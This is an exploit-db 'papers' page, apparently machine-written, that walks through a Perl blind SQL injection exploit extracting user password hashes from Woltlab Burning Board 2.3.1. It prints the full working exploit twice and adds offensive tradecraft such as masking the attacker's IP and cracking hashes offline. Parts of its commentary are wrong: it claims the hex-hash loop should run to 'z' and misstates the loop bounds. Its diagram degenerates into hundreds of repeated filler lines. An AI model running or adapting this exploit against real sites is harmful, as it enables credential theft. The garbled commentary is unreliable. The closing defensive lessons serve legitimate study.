By exploitdb papers bot•May 20, 2005•
papers
Exploiting Woltlab Burning Board 2.3.1 Registration SQL Injection
Exploiting Woltlab Burning Board 2.3.1 Registration SQL Injection
What this paper is
This paper details a SQL injection vulnerability in the register.php script of Woltlab Burning Board version 2.3.1 and earlier. The vulnerability allows an attacker to extract data from the database, specifically the password hash of a user, by manipulating the email address field during the registration process.
Simple technical breakdown
The register.php script, when processing new user registrations, doesn't properly sanitize input in the email address field. An attacker can craft a malicious email address that includes SQL commands. When the database queries are executed with this malformed input, the SQL commands are interpreted and executed, allowing the attacker to extract information.
This exploit uses a technique called "blind SQL injection." It doesn't directly display database errors or data. Instead, it infers information by observing how the application responds to specific crafted queries. In this case, it checks for a specific error message to determine if a condition in the SQL query is met.
The exploit works by iteratively guessing characters of the password hash. For each character position in the hash, it tries to determine if the character is a lowercase letter or a number by sending crafted requests and checking for the presence of a specific error message.
Complete code and payload walkthrough
The provided Perl script automates the process of exploiting this SQL injection vulnerability.
#!/usr/bin/perl
use strict;
use IO::Socket::INET;
# ... (initialization and output) ...
my $host = 'www.security-project.org'; # Target host
my $path = '/wbb2/'; # Path to the Woltlab Burning Board installation
my $userid = 1; # User ID whose password hash we want to extract
my $username = 'deluxe89'; # A valid username on the board
my $proxy = ''; # Optional proxy server
my $error = 'E-Mail-Adresse ist unzulässig'; # Error message indicating a successful injection condition (German for "E-mail address is invalid")
# ... (proxy handling) ...
#
# Get the hash
#
print "[~] Getting the hash. Please wait some minutes..\n[+] Hash: ";
my $hash = '';
for(my $i=1;$i<33;$i++) # Loop for each character of the password hash (assuming 32 characters)
{
my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('[-] Could not connect to server');
if(&test($i, 96)) # Test if the character at position $i is a lowercase letter (ASCII 97-122)
{
for(my $c=97;$c<103;$c++) # Try characters 'a' (97) to 'f' (102) - This range is limited and likely a simplification or error in the original exploit. It should ideally go up to 'z' (122).
{
if(&test($i, $c, 1)) # If the character at position $i matches ASCII value $c
{
print pack('c', $c); # Print the character
last; # Move to the next character position
}
}
}
else # If the character is not a lowercase letter, assume it's a digit
{
#print "0-4\n"; # Debugging line, not functional
for(my $c=48;$c<58;$c++) # Try digits '0' (48) to '9' (57)
{
if(&test($i, $c, 1)) # If the character at position $i matches ASCII value $c
{
print pack('c', $c); # Print the character
last; # Move to the next character position
}
}
}
}
print "\n";
# The 'test' subroutine performs the actual SQL injection attempt.
sub test
{
my ($i, $num, $g) = @_; # $i: character position, $num: ASCII value to test, $g: flag (1 for equality check, 0 for greater than check)
my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('Could not connect to server');
# This is the core of the SQL injection payload.
# It crafts a malicious email address.
my $value = "sre4sdffr\@4g54asd5.org' OR (userid=$userid AND ascii(substring(password,$i,1))";
# 'sre4sdffr@4g54asd5.org' is a dummy email address.
# The single quote (') closes the legitimate email string.
# 'OR' starts the injected SQL condition.
# 'userid=$userid' targets the specific user.
# 'AND ascii(substring(password,$i,1))' extracts the ASCII value of the character at position $i from the password.
# The comparison ($num) is then made.
$value .= ($g) ? '=' : '>'; # If $g is 1, use '=', otherwise use '>'. This allows for both equality and greater-than checks.
$value .= "$num)/*"; # Completes the injected SQL condition. '/*' is a comment to truncate any remaining SQL.
# This constructs the POST data for the registration form.
my $data = "r_username=$username&r_email=$value&r_password=aaaaaaaa&r_confirmpassword=aaaaaaaa&r_homepage=&r_icq=&r_aim=&r_yim=&r_msn=&r_day=0&r_month=0&r_year=&r_gender=0&r_signature=&r_usertext=&field%5B1%5D=&field%5B2%5D=&field%5B3%5D=&r_invisible=0&r_usecookies=1&r_admincanemail=1&r_showemail=1&r_usercanemail=1&r_emailnotify=0&r_notificationperpm=0&r_receivepm=1&r_emailonpm=0&r_emailnotify=0&r_pmpopup=0&r_showsignatures=1&r_showavatars=1&r_showimages=1&r_daysprune=0&r_umaxposts=0&r_threadview=0&r_dateformat=d.m.Y&r_timeformat=H%3Ai&r_startweek=1&r_timezoneoffset=1&r_usewysiwyg=0&r_styleid=0&r_langid=0&send=send&sid=&disclaimer=viewed";
# Sends the crafted POST request to the server.
print $sock "POST http://$host${path}register.php HTTP/1.1\r\nHost: $host\r\nConnection: Close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".length($data)."\r\n\r\n$data\r\n";
# Reads the response from the server.
while(<$sock>)
{
if($_ =~ m/$error/) { return 1; } # If the specific error message is found, the condition was met.
}
return 0; # Otherwise, the condition was not met.
}
# milw0rm.com [2005-05-20]Code Fragment/Block -> Practical Purpose Mapping:
#!/usr/bin/perl- Practical Purpose: Shebang line, indicates the script should be executed with the Perl interpreter.
use strict;- Practical Purpose: Enforces stricter coding rules, helping to catch common errors.
use IO::Socket::INET;- Practical Purpose: Imports the module for creating network sockets, essential for making HTTP requests.
$| = print "...\n";- Practical Purpose: Prints the banner and sets autoflush for standard output, ensuring messages appear immediately.
my $host = '...';- Practical Purpose: Defines the target web server's hostname.
my $path = '...';- Practical Purpose: Defines the directory path where the vulnerable application is installed.
my $userid = 1;- Practical Purpose: Specifies the user ID whose password hash is targeted. This is crucial for the SQL injection query.
my $username = '...';- Practical Purpose: Specifies a valid username on the target board. This is used in the POST data.
my $proxy = '';- Practical Purpose: Placeholder for proxy configuration. If set, the script will route traffic through it.
my $error = '...';- Practical Purpose: Stores the specific error message that indicates a successful SQL injection condition has been met. This is the "oracle" for the blind SQL injection.
($addr, $port) = ($proxy ne '') ? split(/:/, $proxy) : ($host, 80);- Practical Purpose: Parses proxy address and port, or defaults to the target host and port 80 (HTTP).
for(my $i=1;$i<33;$i++) { ... }- Practical Purpose: Outer loop iterating through each character position of the target password hash. Assumes a maximum hash length of 32 characters.
my $sock = new IO::Socket::INET(...);- Practical Purpose: Creates a new TCP socket connection to the target server for each request.
if(&test($i, 96)) { ... } else { ... }- Practical Purpose: Determines whether the current character at position
$iis likely a lowercase letter (ASCII 97-122, tested starting from 96 to catch the range) or a digit (ASCII 48-57).
- Practical Purpose: Determines whether the current character at position
for(my $c=97;$c<103;$c++) { ... }- Practical Purpose: Inner loop to test potential lowercase letter characters. Note: The range
97to103(ASCII 'a' to 'g') is incomplete for a full password hash. It should ideally go up to122('z').
- Practical Purpose: Inner loop to test potential lowercase letter characters. Note: The range
for(my $c=48;$c<58;$c++) { ... }- Practical Purpose: Inner loop to test potential digit characters ('0' to '9').
if(&test($i, $c, 1)) { ... }- Practical Purpose: Calls the
testsubroutine to check if the character at position$imatches the ASCII value$c. The1indicates an equality check.
- Practical Purpose: Calls the
print pack('c', $c);- Practical Purpose: Prints the found character (converted from its ASCII value) to standard output.
last;- Practical Purpose: Exits the inner loop once a matching character is found for the current position.
sub test { ... }- Practical Purpose: Defines the subroutine responsible for crafting and sending the malicious HTTP request.
my ($i, $num, $g) = @_;- Practical Purpose: Receives arguments: character position (
$i), ASCII value to test ($num), and comparison flag ($g).
- Practical Purpose: Receives arguments: character position (
my $value = "sre4sdffr\@4g54asd5.org' OR (userid=$userid AND ascii(substring(password,$i,1))";- Practical Purpose: Constructs the core of the malicious email address string. This is where the SQL injection logic resides. It attempts to extract a character from the
passwordcolumn for the givenuseridand position$i.
- Practical Purpose: Constructs the core of the malicious email address string. This is where the SQL injection logic resides. It attempts to extract a character from the
$value .= ($g) ? '=' : '>';- Practical Purpose: Appends either an equality (
=) or greater-than (>) operator based on the$gflag. This is used for binary searching or simply checking for character existence.
- Practical Purpose: Appends either an equality (
$value .= "$num)/*";- Practical Purpose: Completes the SQL injection.
$numis the ASCII value being tested.)/*closes the injected query and comments out any remaining SQL.
- Practical Purpose: Completes the SQL injection.
my $data = "...";- Practical Purpose: Formats the complete POST request body with all the registration form fields, including the crafted malicious email.
print $sock "POST ...";- Practical Purpose: Sends the crafted HTTP POST request to the target server.
while(<$sock>) { if($_ =~ m/$error/) { return 1; } }- Practical Purpose: Reads the server's response line by line. If the predefined
$errorstring is found, it means the SQL condition was true, and the subroutine returns1(true).
- Practical Purpose: Reads the server's response line by line. If the predefined
return 0;- Practical Purpose: If the error message is not found after checking the entire response, the subroutine returns
0(false).
- Practical Purpose: If the error message is not found after checking the entire response, the subroutine returns
Shellcode/Payload Segments:
This exploit does not contain traditional shellcode in the sense of executable machine code. Instead, the "payload" is the crafted SQL query embedded within the r_email parameter.
- Stage 1: SQL Injection Payload Construction:
- Purpose: To inject a malicious SQL query into the
r_emailfield. - Mechanism: The Perl script constructs a string like:
sre4sdffr@4g54asd5.org' OR (userid=1 AND ascii(substring(password,1,1)) > 96)/* - Explanation:
sre4sdffr@4g54asd5.org: A dummy email address.': Closes the expected string literal for the email field.OR: Introduces the injected condition.(userid=1 AND ascii(substring(password,1,1)) > 96): This is the core logic.userid=1: Targets the user with ID 1.AND: Combines conditions.ascii(substring(password,1,1)): Extracts the ASCII value of the first character (substring(password,1,1)) from thepasswordcolumn of the user specified byuserid.> 96: Compares the extracted ASCII value. The script uses this to determine if the character is a letter (ASCII > 96) or a digit (ASCII <= 96, though the script tests digits separately).
)/*: Closes the injected condition and comments out any remaining SQL syntax in the original query, preventing syntax errors.
- Purpose: To inject a malicious SQL query into the
- Stage 2: Blind SQL Injection Oracle:
- Purpose: To determine if the injected SQL condition is true or false.
- Mechanism: The script checks the HTTP response for the presence of the
$errorstring (E-Mail-Adresse ist unzulässig). - Explanation: If the injected condition (
ascii(substring(password,1,1)) > 96) evaluates to true, theregister.phpscript likely processes the user data differently or encounters an error related to the invalid email format after the SQL injection has influenced the query logic. The specific error message is the signal. If the condition is false, the application might proceed differently, and the error message won't appear.
- Stage 3: Character Guessing (Iterative Refinement):
- Purpose: To reconstruct the password hash character by character.
- Mechanism: The script loops through each character position (
$ifrom 1 to 32) and for each position, it iterates through possible ASCII values ($cfrom 97 to 102 for letters, 48 to 57 for digits). - Explanation:
- For position
$i, it tests ifascii(substring(password,$i,1))is equal to a specific ASCII value$c. - If
test($i, $c, 1)returns true (meaning the error message appears), that character$cis the correct character for position$i. - The script prints this character and moves to the next position.
- The original exploit's character range for letters (
97to103) is incomplete. A full implementation would test up to122(ASCII 'z').
- For position
Practical details for offensive operations teams
- Required Access Level: Network access to the target web server. No authenticated access to the web application is required for this specific exploit.
- Lab Preconditions:
- A functional Perl environment with
IO::Socket::INETavailable. - A target Woltlab Burning Board 2.3.1 (or earlier) instance, accessible over the network.
- Knowledge of the target host, installation path (
$path), and the user ID ($userid) whose password hash is desired. - The correct
$errorstring for the target board's language. The exploit provides the German version; an English board would requireemail address entered is already ta.
- A functional Perl environment with
- Tooling Assumptions:
- Perl interpreter.
- A network scanner (e.g., Nmap) to identify open ports and hostnames.
- A web browser or proxy (e.g., Burp Suite) to manually verify the vulnerability or observe traffic.
- Execution Pitfalls:
- Incorrect
$pathor$userid: If these are wrong, the SQL injection will not target the correct user or database table, leading to failure. - Incorrect
$errorstring: The exploit relies on detecting this specific error. If the target board uses different error messages or handles the error differently, the exploit will fail to detect successful injections. - Incomplete Character Set: The exploit's loop for testing letters (
97to103) is limited. If the password hash contains characters outside this range (e.g., 'h' through 'z'), the exploit will fail to extract them. A more robust exploit would iterate through the full ASCII range for letters and digits. - Database Configuration/WAF: Modern Web Application Firewalls (WAFs) or stricter database configurations might detect and block the SQL injection patterns, even in older applications.
- Rate Limiting/IP Blocking: Repeated connection attempts from the same IP address might trigger rate limiting or IP blocking mechanisms on the server.
- Timeout Issues: Network latency or slow server responses could cause the
IO::Socket::INETtimeouts to trigger, aborting connections prematurely. - Hash Complexity: If the password hash is very long or uses a character set not covered by the exploit's guessing loops, extraction will be incomplete or impossible.
- Incorrect
- Tradecraft Considerations:
- Reconnaissance: Thoroughly identify the target application version and path. Confirm the language of the target board to set the correct
$errorstring. Identify a target$userid. - Stealth: The exploit makes numerous HTTP requests. Consider using a proxy chain or VPN to mask the origin IP. Monitor for unusual network traffic patterns.
- Error Handling: Implement robust error handling in the script to gracefully manage connection failures, timeouts, or unexpected responses.
- Output Analysis: Carefully analyze the script's output. Incomplete hashes or no output indicate potential issues.
- Post-Exploitation: Once a password hash is obtained, it needs to be cracked offline using tools like Hashcat or John the Ripper.
- Reconnaissance: Thoroughly identify the target application version and path. Confirm the language of the target board to set the correct
Where this was used and when
- Context: This vulnerability was discovered and published in 2005. It targets a specific version of a popular PHP web forum software (Woltlab Burning Board).
- Usage: Exploits like this were commonly used by security researchers and malicious actors to gain unauthorized access to web forums, potentially leading to defacement, data theft, or further compromise of the server. The ability to extract password hashes allowed attackers to perform offline brute-force attacks to recover user credentials.
- Approximate Years/Dates: The exploit was published on May 20, 2005. Vulnerabilities of this nature were prevalent in web applications during the early to mid-2000s before widespread adoption of input sanitization best practices and WAFs.
Defensive lessons for modern teams
- Input Validation and Sanitization: This is the most crucial lesson. All user-supplied input, especially data that will be used in database queries, must be strictly validated and sanitized. This includes:
- Parameterized Queries/Prepared Statements: Use these exclusively for database interactions. They separate SQL code from data, preventing injection.
- Whitelisting: Only allow known-good characters or formats for specific fields (e.g., email addresses, usernames).
- Blacklisting (with caution): While less effective than whitelisting, blocking known malicious characters or patterns can be a secondary defense.
- Web Application Firewalls (WAFs): Deploy and properly configure WAFs to detect and block common injection patterns, including SQL injection. Keep WAF rules updated.
- Regular Patching and Updates: Keep all web applications, frameworks, and server software up to date with the latest security patches. Woltlab Burning Board would have released patches for this vulnerability.
- Least Privilege Principle: Ensure the web application's database user has only the minimum necessary privileges. Avoid granting broad permissions like
SELECT *on sensitive tables if not absolutely required. - Error Handling: Configure applications to display generic error messages to users and log detailed errors server-side. Avoid exposing detailed database error messages that could aid attackers.
- Secure Coding Practices: Train developers on secure coding principles, including the dangers of SQL injection and how to prevent it.
- Security Audits and Code Reviews: Regularly audit and review application code for potential vulnerabilities.
ASCII visual (if applicable)
This exploit is primarily a network-based attack targeting a web application. A simple flow diagram can illustrate the process.
+-----------------+ +----------------------+ +--------------------------+
| Attacker's |----->| Target Web Server |----->| Woltlab Burning Board |
| Machine (Perl) | | (e.g., Apache/Nginx) | | (register.php) |
+-----------------+ +----------+-----------+ +------------+-------------+
| | |
| 1. Craft Malicious | | 3. Process Request
| HTTP POST Request | | (SQL Injection occurs)
| (SQL in email field) | |
| | |
| | |
| | |
| | |
| | |
| 2. Send Request | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |
---
## Original Exploit-DB Content (Verbatim)
```text
#!/usr/bin/perl
use strict;
use IO::Socket::INET;
$| = print "
Woltlab Burning Board <= 2.3.1 Exploit
Vulnerability discovered by GulfTech Security Research
Visit www.security-project.org
Exploit by deluxe89
----------
";
my $host = 'www.security-project.org';
my $path = '/wbb2/'; # path to the board
my $userid = 1; # the password hash will be from the user with this id
my $username = 'deluxe89'; # any username from the board
my $proxy = ''; # proxy, you can leave this empty
my $error = 'E-Mail-Adresse ist unzulässig'; # use 'email address entered is already ta' for english boards
# proxy handling
my ($addr, $port) = ($proxy ne '') ? split(/:/, $proxy) : ($host, 80);
if($proxy ne '')
{
print "[~] Using a proxy\n";
}
else
{
print "[~] You're using NO proxy!\n";
sleep(1);
}
#
# Get the hash
#
print "[~] Getting the hash. Please wait some minutes..\n[+] Hash: ";
my $hash = '';
for(my $i=1;$i<33;$i++)
{
my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('[-] Could not connect to server');
if(&test($i, 96)) # buchstabe
{
for(my $c=97;$c<103;$c++)
{
if(&test($i, $c, 1))
{
print pack('c', $c);
last;
}
}
}
else # zahl
{
#print "0-4\n";
for(my $c=48;$c<58;$c++)
{
if(&test($i, $c, 1))
{
print pack('c', $c);
last;
}
}
}
}
print "\n";
sub test
{
my ($i, $num, $g) = @_;
my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('Could not connect to server');
my $value = "sre4sdffr\@4g54asd5.org' OR (userid=$userid AND ascii(substring(password,$i,1))";
$value .= ($g) ? '=' : '>';
$value .= "$num)/*";
my $data = "r_username=$username&r_email=$value&r_password=aaaaaaaa&r_confirmpassword=aaaaaaaa&r_homepage=&r_icq=&r_aim=&r_yim=&r_msn=&r_day=0&r_month=0&r_year=&r_gender=0&r_signature=&r_usertext=&field%5B1%5D=&field%5B2%5D=&field%5B3%5D=&r_invisible=0&r_usecookies=1&r_admincanemail=1&r_showemail=1&r_usercanemail=1&r_emailnotify=0&r_notificationperpm=0&r_receivepm=1&r_emailonpm=0&r_pmpopup=0&r_showsignatures=1&r_showavatars=1&r_showimages=1&r_daysprune=0&r_umaxposts=0&r_threadview=0&r_dateformat=d.m.Y&r_timeformat=H%3Ai&r_startweek=1&r_timezoneoffset=1&r_usewysiwyg=0&r_styleid=0&r_langid=0&send=send&sid=&disclaimer=viewed";
print $sock "POST http://$host${path}register.php HTTP/1.1\r\nHost: $host\r\nConnection: Close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".length($data)."\r\n\r\n$data\r\n";
while(<$sock>)
{
if($_ =~ m/$error/) { return 1; }
}
return 0;
}
# milw0rm.com [2005-05-20]